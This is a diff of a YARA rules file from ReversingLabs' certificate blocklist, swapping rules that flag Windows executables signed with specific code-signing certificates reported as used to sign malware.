-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "UPLagga Systems s.r.o." and ( pe.signatures [ i ] . serial == "00:92:d9:b9:2f:8c:f7:a1:ba:8b:2c:02:5b:e7:30:c3:00" or pe.signatures [ i ] . serial == "92:d9:b9:2f:8c:f7:a1:ba:8b:2c:02:5b:e7:30:c3:00" ) and 1598054400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Digital Capital Management Ireland Limited" and ( pe.signatures [ i ] . serial == "00:da:df:44:e4:04:63:72:31:3e:e9:7b:8e:39:4c:40:79" or pe.signatures [ i ] . serial == "da:df:44:e4:04:63:72:31:3e:e9:7b:8e:39:4c:40:79" ) and 1600244736 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_B8164F7143E1A313003Ab0C834562F1F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_F8C2E08438Bb0E9Adc955E4B493E5821 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "50d50330-4098-59dd-b2da-0714eefdfc66"
+		id = "65297530-2482-5773-8914-461fb56cb41d"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11142-L11160"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5138-L5156"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a42fec2e0e8d37948420f16907f39c3d502c535be98024d04a777dfbc633004d"
+		logic_hash = "5dbe554032c945c46ffd61ef1e0deb59d396a70dd63994bf44c65d849ec8220a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22037,21 +44431,21 @@ rule REVERSINGLABS_Cert_Blocklist_B8164F7143E1A313003Ab0C834562F1F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ekitai Data Inc." and ( pe.signatures [ i ] . serial == "00:b8:16:4f:71:43:e1:a3:13:00:3a:b0:c8:34:56:2f:1f" or pe.signatures [ i ] . serial == "b8:16:4f:71:43:e1:a3:13:00:3a:b0:c8:34:56:2f:1f" ) and 1598313600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DocsGen Software Solutions Inc." and ( pe.signatures [ i ] . serial == "00:f8:c2:e0:84:38:bb:0e:9a:dc:95:5e:4b:49:3e:58:21" or pe.signatures [ i ] . serial == "f8:c2:e0:84:38:bb:0e:9a:dc:95:5e:4b:49:3e:58:21" ) and 1599523200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_24E4A2B3Db6Be1007B9Ddc91995Bc0C8 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_70E1Ebd170Db8102D8C28E58392E5632 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8e533ebf-a124-53a9-8647-6f4b40aaa066"
+		id = "e3b0f68c-8cc9-5275-988a-8d955ea25a47"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11162-L11178"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5158-L5174"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "861691ce7bae4366f3b35d01c84bb0031b54653869f52eaccf20808b1b55d2af"
+		logic_hash = "e1738eddc1da0876a373ee7f35bff155d56c1b98a23cb117c0e7a966f8fa3c92"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22061,21 +44455,21 @@ rule REVERSINGLABS_Cert_Blocklist_24E4A2B3Db6Be1007B9Ddc91995Bc0C8 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FLY BETTER s.r.o." and pe.signatures [ i ] . serial == "24:e4:a2:b3:db:6b:e1:00:7b:9d:dc:91:99:5b:c0:c8" and 1645142400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Equal Cash Technologies Limited" and pe.signatures [ i ] . serial == "70:e1:eb:d1:70:db:81:02:d8:c2:8e:58:39:2e:56:32" and 1599264000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_881573Fc67Ff7395Dde5Bccfbce5B088 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_09C89De6F64A7Fdf657E69353C5Fdd44 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d188c65c-ee7b-586f-95f0-8de5b506c325"
+		id = "f86eafb5-ec59-58c5-b5f9-01a6704fb555"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11180-L11198"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5176-L5192"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ce489a4a2f07181d6fbf295f426deeaf51310e061bac2e56d65b37eeb397ff9a"
+		logic_hash = "1cb57cd68cda91754307d2e4d94ea011975bbfff0f15134081a5aa11870b0db1"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22085,21 +44479,21 @@ rule REVERSINGLABS_Cert_Blocklist_881573Fc67Ff7395Dde5Bccfbce5B088 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Trade in Brasil s.r.o." and ( pe.signatures [ i ] . serial == "00:88:15:73:fc:67:ff:73:95:dd:e5:bc:cf:bc:e5:b0:88" or pe.signatures [ i ] . serial == "88:15:73:fc:67:ff:73:95:dd:e5:bc:cf:bc:e5:b0:88" ) and 1620000000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "EXON RENTAL SP Z O O" and pe.signatures [ i ] . serial == "09:c8:9d:e6:f6:4a:7f:df:65:7e:69:35:3c:5f:dd:44" and 1601337601 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_53E1F226Cb77574F8Fbeb5682Da091Bb : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Ffff2Ce862378B26440Df49Ca9175B70 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "fe3abe27-c8c8-54b8-b031-0546c9bfda90"
+		id = "d5d1e84d-328f-53ac-adb6-3824fa77a47d"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11200-L11216"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5194-L5212"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "591846225d5faf3ee8f3102acaad066f0187219044077bbdaf32345613b00965"
+		logic_hash = "8ed7b0643b07ce4954f570157e1534ee1ed647717cce00fe7f2b572c9b5d0042"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22109,21 +44503,21 @@ rule REVERSINGLABS_Cert_Blocklist_53E1F226Cb77574F8Fbeb5682Da091Bb : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OdyLab Inc" and pe.signatures [ i ] . serial == "53:e1:f2:26:cb:77:57:4f:8f:be:b5:68:2d:a0:91:bb" and 1654020559 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "F & A.TIM d.o.o." and ( pe.signatures [ i ] . serial == "00:ff:ff:2c:e8:62:37:8b:26:44:0d:f4:9c:a9:17:5b:70" or pe.signatures [ i ] . serial == "ff:ff:2c:e8:62:37:8b:26:44:0d:f4:9c:a9:17:5b:70" ) and 1576195200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0772B4D1D63233D2B8771997Bc8Da5C4 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_3223B4616C2687C04865Bee8321726A8 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "fe602ac3-fa34-5056-a2cc-5ae9de728559"
+		id = "089aae56-4f46-563c-800a-dbf57db2bde6"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11218-L11234"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5214-L5230"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "30586a643b29f3c943b3f35bb1639c5b9fa48ecbd776775086e35af502aa4a7a"
+		logic_hash = "fcb0a14866b3612c5ec5a7db7a3333e20a4605695b3d019eef84de85d7b3ea4d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22133,21 +44527,21 @@ rule REVERSINGLABS_Cert_Blocklist_0772B4D1D63233D2B8771997Bc8Da5C4 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Maya logistika d.o.o." and pe.signatures [ i ] . serial == "07:72:b4:d1:d6:32:33:d2:b8:77:19:97:bc:8d:a5:c4" and 1637971201 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FORTUNE STAR TRADING, INC." and pe.signatures [ i ] . serial == "32:23:b4:61:6c:26:87:c0:48:65:be:e8:32:17:26:a8" and 1601337600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_02B6656292310B84022Db5541Bc48Faf : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7709D2Df39E9A4F7Db2F3Cbc29B49743 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d679238f-a697-5322-815c-9986c9d24032"
+		id = "7227daa3-453d-5bb8-804c-8a97cd0d81c6"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11236-L11252"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5232-L5248"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "40b570b28e10ebd2a1ba515dc3fa45bdb5c0b76044e4dda7a6819976072a67a2"
+		logic_hash = "c9ade45e0f9fb737a08ffa94d1fff89471a1cbcbacc139730fab88e382226d0b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22157,21 +44551,21 @@ rule REVERSINGLABS_Cert_Blocklist_02B6656292310B84022Db5541Bc48Faf : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DILA d.o.o." and pe.signatures [ i ] . serial == "02:b6:65:62:92:31:0b:84:02:2d:b5:54:1b:c4:8f:af" and 1613865600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Grina LLC" and pe.signatures [ i ] . serial == "77:09:d2:df:39:e9:a4:f7:db:2f:3c:bc:29:b4:97:43" and 1556353331 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_64C2505C7306639Fc8Eae544B0305338 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_E29690E14518874D2Dcf00234Ae94F1F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b0e4057f-a0e7-5e2e-a47f-dc8188b6b506"
+		id = "6b4f26d3-b943-5a2e-bfb9-0e290031926a"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11254-L11270"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5250-L5268"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "9b6fb002d603135391958668be0ef805e441928a035c9c4da4bb9915aa3086e8"
+		logic_hash = "ef84815798b213dc49a142e3076cc6dd680dccabe72643fc86234024a46468f9"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22181,21 +44575,21 @@ rule REVERSINGLABS_Cert_Blocklist_64C2505C7306639Fc8Eae544B0305338 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MANILA Solution as" and pe.signatures [ i ] . serial == "64:c2:50:5c:73:06:63:9f:c8:ea:e5:44:b0:30:53:38" and 1609418043 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GRIND & TAMP ENTERPRISES PTY LTD" and ( pe.signatures [ i ] . serial == "00:e2:96:90:e1:45:18:87:4d:2d:cf:00:23:4a:e9:4f:1f" or pe.signatures [ i ] . serial == "e2:96:90:e1:45:18:87:4d:2d:cf:00:23:4a:e9:4f:1f" ) and 1570838400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2F96A89Bfec6E44Dd224E8Fd7E72D9Bb : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Cfac705C7E6845904F99995324F7562C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "bdca8435-c1fd-598d-bd82-20a3a3b2a959"
+		id = "42aa3105-a077-5962-8d5d-50429254582b"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11272-L11288"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5270-L5288"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "c0c8e5c0e2e120ee6b055e9a6b2af3d424bed0832c2619beab658fe01757f69f"
+		logic_hash = "68bcfe60c2e7154f427c20d0471ede99e55c8200149a4438d5a2a75982fcd419"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22205,21 +44599,21 @@ rule REVERSINGLABS_Cert_Blocklist_2F96A89Bfec6E44Dd224E8Fd7E72D9Bb : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NAILS UNLIMITED LIMITED" and pe.signatures [ i ] . serial == "2f:96:a8:9b:fe:c6:e4:4d:d2:24:e8:fd:7e:72:d9:bb" and 1625529600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HMWOCFPSDLAFMFZIVD" and ( pe.signatures [ i ] . serial == "cf:ac:70:5c:7e:68:45:90:4f:99:99:53:24:f7:56:2c" or pe.signatures [ i ] . serial == "30:53:8f:a3:81:97:ba:6f:b0:66:66:ac:db:08:a9:d4" ) and 1601918720 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_B649A966410F62999C939384Af553919 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_A7989F8Be0C82D35A19E7B3Dd4Be30E5 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "03533c22-eb16-546c-af55-675af9c833ce"
+		id = "21d54d40-442e-50f5-a561-41b3d6239bac"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11290-L11308"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5290-L5308"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "623a2f931198eacf44fd233065e96a4dcadb5b3bbc7ca56df2b6ae9eafc4faa5"
+		logic_hash = "a50129908a471e6692bcf663abd5ef52861d4a46fdf528f39efe816ee6150edf"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22229,21 +44623,21 @@ rule REVERSINGLABS_Cert_Blocklist_B649A966410F62999C939384Af553919 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "F.A.T. SARL" and ( pe.signatures [ i ] . serial == "00:b6:49:a9:66:41:0f:62:99:9c:93:93:84:af:55:39:19" or pe.signatures [ i ] . serial == "b6:49:a9:66:41:0f:62:99:9c:93:93:84:af:55:39:19" ) and 1590537600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Instamix Limited" and ( pe.signatures [ i ] . serial == "00:a7:98:9f:8b:e0:c8:2d:35:a1:9e:7b:3d:d4:be:30:e5" or pe.signatures [ i ] . serial == "a7:98:9f:8b:e0:c8:2d:35:a1:9e:7b:3d:d4:be:30:e5" ) and 1598054400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_45245Eef53Fcf38169C715Cf68F44452 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0Fa13Ae98E17Ae23Fcfe7Ae873D0C120 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "514eac5a-9264-58ef-b4ee-65ec24b43e5a"
+		id = "87a47456-4d90-5a7d-af9d-7a6d5fb8efac"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11310-L11326"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5310-L5326"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "7e0c3147e657802e457f6df271b7f5a64c81fd13f936a8935aa991022e4ab238"
+		logic_hash = "415f39f82b6a45acd196ccf246ec660806a8d66c61df8c7d2850e5b244118d04"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22253,21 +44647,21 @@ rule REVERSINGLABS_Cert_Blocklist_45245Eef53Fcf38169C715Cf68F44452 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PAPER AND CORE SUPPLIES LTD" and pe.signatures [ i ] . serial == "45:24:5e:ef:53:fc:f3:81:69:c7:15:cf:68:f4:44:52" and 1639958400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KLAKSON, LLC" and pe.signatures [ i ] . serial == "0f:a1:3a:e9:8e:17:ae:23:fc:fe:7a:e8:73:d0:c1:20" and 1597276801 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_1895433Ee9E2Bd48619D75132262616F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_3696883055975D571199C6B5D48F3Cd5 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d7bf59df-708c-5260-bc98-1a86b2c9c988"
+		id = "f68338f9-8614-5793-981d-70547dbc65ce"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11328-L11344"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5328-L5344"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f00a29ff5dddae40225ab62cb2d4b9dec1539ad58c8cd27d686480eecdb3e31d"
+		logic_hash = "d6f77b9ca928167341a35b83e353886d4db8dfcecf45cde0f0f93d65059b5200"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22277,21 +44671,21 @@ rule REVERSINGLABS_Cert_Blocklist_1895433Ee9E2Bd48619D75132262616F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Evetrans Ltd" and pe.signatures [ i ] . serial == "18:95:43:3e:e9:e2:bd:48:61:9d:75:13:22:62:61:6f" and 1619789516 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Korist Networks Incorporated" and pe.signatures [ i ] . serial == "36:96:88:30:55:97:5d:57:11:99:c6:b5:d4:8f:3c:d5" and 1600069289 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_1Ffc9825644Caf5B1F521780C5C7F42C : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Ee678930D5Bdfaa2Ab0172Fa4C10Ae07 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "3d806d90-e029-5521-b191-6967e2691c0f"
+		id = "e2c2c34a-6177-5457-9ed9-fa34f82ee4cd"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11346-L11362"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5346-L5364"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "1a9263c809f5633d01d4d4d0091c8dc214bad73af0eff3c9a94b33bca513f26d"
+		logic_hash = "f1e254450fdbe94172a4fa2d2727c3ade5ae436cf4c0c1153a15e9a2f64f2452"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22301,21 +44695,21 @@ rule REVERSINGLABS_Cert_Blocklist_1Ffc9825644Caf5B1F521780C5C7F42C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ACTIVUS LIMITED" and pe.signatures [ i ] . serial == "1f:fc:98:25:64:4c:af:5b:1f:52:17:80:c5:c7:f4:2c" and 1615507200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LEX CORPORATION PTY LTD" and ( pe.signatures [ i ] . serial == "00:ee:67:89:30:d5:bd:fa:a2:ab:01:72:fa:4c:10:ae:07" or pe.signatures [ i ] . serial == "ee:67:89:30:d5:bd:fa:a2:ab:01:72:fa:4c:10:ae:07" ) and 1571011200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_8D52Fb12A2511E86Bbb0Ba75C517Eab0 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_D7C432E8D4Edef515Bfb9D1C214Ff0F5 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "1bc9d36c-381e-5359-bba4-8dd870ed9267"
+		id = "5aed508e-2da1-52a0-98f3-52e903e95b7d"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11364-L11382"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5366-L5384"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "023830ab3d71ed8ecf8f0e271c56dc267dcd000f5ff156c70d31089cd7010da8"
+		logic_hash = "63741513f3ab2f51ecd66dc973239c9dc194b86504fe26b2dd4a7f31299e5497"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22325,21 +44719,21 @@ rule REVERSINGLABS_Cert_Blocklist_8D52Fb12A2511E86Bbb0Ba75C517Eab0 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VThink Software Consulting Inc." and ( pe.signatures [ i ] . serial == "00:8d:52:fb:12:a2:51:1e:86:bb:b0:ba:75:c5:17:ea:b0" or pe.signatures [ i ] . serial == "8d:52:fb:12:a2:51:1e:86:bb:b0:ba:75:c5:17:ea:b0" ) and 1599177600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LLC \"MILKY PUT\"" and ( pe.signatures [ i ] . serial == "00:d7:c4:32:e8:d4:ed:ef:51:5b:fb:9d:1c:21:4f:f0:f5" or pe.signatures [ i ] . serial == "d7:c4:32:e8:d4:ed:ef:51:5b:fb:9d:1c:21:4f:f0:f5" ) and 1601596800 <= pe.signatures [ i ] . not_after )
 }
 
